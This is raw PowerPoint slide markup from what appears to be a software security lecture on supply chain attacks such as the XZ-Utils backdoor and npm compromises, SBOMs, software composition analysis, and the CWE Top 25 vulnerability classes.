              <a:t>https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/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AF2AEC77-7434-46CA-BE34-C63E21E2B0BF}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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973" y="2989987"/>
            <a:ext cx="6045200" cy="95885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" t="32455" r="-127" b="-2360"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2565973" y="2314935"/>
            <a:ext cx="5720602" cy="717006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4"/>
          <a:srcRect l="2368" t="2740" r="-2368" b="-2740"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="521715" y="4088357"/>
            <a:ext cx="4248477" cy="1257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9D73A5-0CD3-7D54-31B3-7CF4F14FF3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712"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1015175"/>
            <a:ext cx="5868144" cy="135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10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29782-E092-7190-7637-44F4D8743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XZ-Utils supply chain attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>(2024) 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E1376-C8B9-9697-AF5C-DAC72A1D9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754772-6879-9D7E-93A7-641A6B75A25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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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62C130-F8E9-5EF9-0FA8-CD715DBDCD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37" t="25327" r="3022"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="354494" y="1117623"/>
            <a:ext cx="5585657" cy="13608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B2FB92-3063-B9A3-6A26-078EB7B84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637" y="2731080"/>
            <a:ext cx="6984776" cy="16401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794800-C218-777B-B665-DEAAEF599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376" y="2599341"/>
            <a:ext cx="1966854" cy="4373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2A9A95-57F5-4E1E-5F10-D93B4D56879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48" t="7332" r="9214" b="10836"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4845833" y="1182972"/>
            <a:ext cx="1082175" cy="3870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8CC5E38-334C-0808-72AF-21F45FAD35DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="361034" y="5767814"/>
            <a:ext cx="84969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https://arstechnica.com/security/2024/04/what-we-know-about-the-xz-utils-backdoor-that-almost-infected-the-world/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="9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https://www.cisa.gov/news-events/alerts/2024/03/29/reported-supply-chain-compromise-affecting-xz-utils-data-compression-library-cve-2024-3094</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>https://www.wired.com/story/xz-backdoor-everything-you-need-to-know/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635F27-BF03-5206-37B6-C7C6120505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48" y="4433339"/>
            <a:ext cx="5940152" cy="107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928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D65E1-FA04-57D4-0A7E-F73B765E6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npm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> supply chain attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>(Sept 2025)</a:t>
            </a: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0BA2E-3205-632C-FD85-0295E5C4DFE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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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900272-00F0-CC23-53E7-2F1B212D5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064211"/>
            <a:ext cx="6115904" cy="538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517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6D61C-F816-CAD7-19E2-683F12137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npm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> supply chain attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> (Oct 2026)</a:t>
            </a:r>
            <a:endParaRPr lang="en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7DF12-72FE-8177-C9C2-E35F8422A59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B0AFA7E-F259-4E8C-B723-8D60AEC68A7B}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl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0DEECB-3829-FA35-2470-CC6AA8BE0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368628"/>
            <a:ext cx="7390579" cy="234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94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 SBOM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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Software Bill of Materials (SBOM) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inventory of software components of some product</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1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Goal: insight in supply chain &amp; dependencies,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to be aware of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attack surface </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>that the supply chain brings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to manage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>patching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7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Ideally in machine readable format, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eg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CycloneDX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, SPDX, or just CSV</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>US &amp; EU regulation is pushing to make SBOMs mandatory: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>e.g. Cyber Resilience Act requires manufactures to have SBOM that they can provide on demand to government oversight agencies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Current state-of-the art: companies are producing SBOMs, but nobody seems to be using other people’s SBOMs yet </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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36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56242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5D550-06DD-1220-2F21-3DA3F2B2E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BE7F0-FB3F-1D7C-1C40-6565965A5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 SCA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0B75C6F-9EBD-0DB1-5D5D-42AB9780B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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Software Composition Analysis (SCA) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tools statically </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>analyse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> code to recursively find all the dependencies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>effectively producing an SBOM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to then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check for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>known CVEs 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check for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>suspicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> poorly maintained code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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checking for unfixed bugs &amp; lack of updates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lack of developer activity, ...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typo-squatting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...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="9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A9A1F02-9878-B33B-47B4-AE3E2AC82F0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37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58653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642938" y="1214438"/>
            <a:ext cx="7772400" cy="2070546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br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0"/>
              <a:t>Classes of</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0"/>
              <a:t>security vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="2000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295400" y="3505200"/>
            <a:ext cx="6400800" cy="2778125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buFont typeface="Times New Roman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 dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman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 dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman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1705750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 Classifications &amp; rankings of security flaws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5800" y="1124745"/>
            <a:ext cx="8062664" cy="4960144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Many proposals to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>categorise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rank</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> common security types</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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2"/>
          <a:srcRect l="3006" r="2301"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="899592" y="1821813"/>
            <a:ext cx="3528392" cy="2057698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3"/>
          <a:srcRect b="9287"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5643472" y="2064781"/>
            <a:ext cx="1211037" cy="1364219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4"/>
          <a:srcRect l="28741" t="1" r="28535" b="-614"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248990" y="2605034"/>
            <a:ext cx="1164836" cy="1440161"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Common Weakness Enumeration CWE™ - Top 25 Most Dangerous Software ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ECB9078-4B0A-710A-832A-93B12C6D31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9912" y="4075258"/>
            <a:ext cx="2016224" cy="201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44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6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="661792" y="135383"/>
            <a:ext cx="7761288" cy="845345"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>CWE Top 25     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>[2021]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half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536154" y="980728"/>
            <a:ext cx="4030290" cy="5328592"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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Cross-Site Scripting (XSS)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Read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Improper Input  Validation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OS command injection         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SQL Injection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Use After Free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Path traversal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/>
              <a:t>Cross-Site Request Forgery (CSRF)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/>
              <a:t>Unrestricted Upload of File with Dangerous Type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Missing Authentication for Critical Function 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Integer Overflow or Wraparound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/>
              <a:t>Deserialization of Untrusted Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>Improper Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4641850" y="946472"/>
            <a:ext cx="4034606" cy="481612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NULL Pointer Dereference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Use of Hard-coded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Improper Restriction of Operations within Buffer Bounds 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Missing Authorization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Default Permissions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Exposure of Sensitive Information to an Unauthorized Actor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Insufficiently Protected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Permission Assignment for Critical Resource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Improper Restriction of XML External Entity Reference </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(XXE)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Server-Side Request Forgery (SSRF)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altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command Injection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54E722-E123-3868-FF92-A7DB8C525B41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1366296" y="6140043"/>
            <a:ext cx="7056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GB" sz="16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https://cwe.mitre.org/top25/index.html </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1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49265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CWE Top 944 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800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See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://cwe.mitre.org/data/definitions/1000.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600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D3A9F61A-0238-41AE-BB0B-6E00DBB90FAC}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Tijdelijke aanduiding voor inhoud 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="-3174" t="8103" r="50" b="8362"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="751799" y="1106092"/>
            <a:ext cx="2167793" cy="4195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2" name="Tijdelijke aanduiding voor inhoud 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="-3174" t="10427" r="50" b="6233"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4959307" y="1124106"/>
            <a:ext cx="2167793" cy="418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Tijdelijke aanduiding voor inhoud 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="-3174" t="14212" r="50" b="3081"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2780106" y="1150468"/>
            <a:ext cx="2167793" cy="415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4" name="Tijdelijke aanduiding voor inhoud 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="-3174" t="17450" r="50" b="-240"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6976207" y="1160748"/>
            <a:ext cx="2167793" cy="41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3427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sadsd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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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77484" y="-367243"/>
            <a:ext cx="14098968" cy="7592485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-1116632" y="6509822"/>
            <a:ext cx="508126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http://cwe.mitre.org/data/pdf/1000_with_1344_colors.pdf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1804030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Classifications of security flaws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5800" y="1124745"/>
            <a:ext cx="8062664" cy="4960144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These classifications &amp; taxonomies are</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>useful</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for awareness &amp; prevention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for understanding &amp; tackling root causes</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>messy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>as you can classify flaws in very different ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>always</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>incomplete</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>there are always new &amp; more attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application-specific flaws will be missing in generic taxonomies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>can be misleading</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. ‘lack of input validation’ is often misnomer, as should become clear in next weeks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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43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26028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6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="661792" y="135383"/>
            <a:ext cx="7761288" cy="845345"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Memory corruption? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="160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half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536154" y="980728"/>
            <a:ext cx="4030290" cy="5328592"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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Cross-Site Scripting (XSS)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Read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Improper Input  Validation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OS command injection         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SQL Injection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Use After Free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Path traversal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/>
              <a:t>Cross-Site Request Forgery (CSRF)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/>
              <a:t>Unrestricted Upload of File with Dangerous Type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Missing Authentication for Critical Function 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Integer Overflow or Wraparound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/>
              <a:t>Deserialization of Untrusted Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>Improper Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4641850" y="946472"/>
            <a:ext cx="4034606" cy="481612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NULL Pointer Dereference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Use of Hard-coded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Improper Restriction of Operations within Buffer Bounds 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Missing Authorization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Default Permissions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Exposure of Sensitive Information to an Unauthorized Actor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Insufficiently Protected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Permission Assignment for Critical Resource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Improper Restriction of XML External Entity Reference </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(XXE)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/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Server-Side Request Forgery (SSRF)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altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command Injection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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{017B7248-1F1A-1E6B-258E-82BC0990AA6E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6553200" y="6248400"/>
            <a:ext cx="1893888" cy="446088"/>
          </a:xfrm>
        </p:spPr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44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862296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6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="661792" y="135383"/>
            <a:ext cx="7761288" cy="845345"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Memory corruption </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C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half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536154" y="980728"/>
            <a:ext cx="4030290" cy="5328592"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Out-of-bounds Write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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Cross-Site Scripting (XSS)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C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Out-of-bounds Read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Improper Input  Validation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OS command injection         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SQL Injection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C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use After Free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Path traversal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/>
              <a:t>Cross-Site Request Forgery (CSRF)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/>
              <a:t>Unrestricted Upload of File with Dangerous Type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Missing Authentication for Critical Function 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Integer Overflow or Wraparound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/>
              <a:t>Deserialization of Untrusted Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>Improper Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
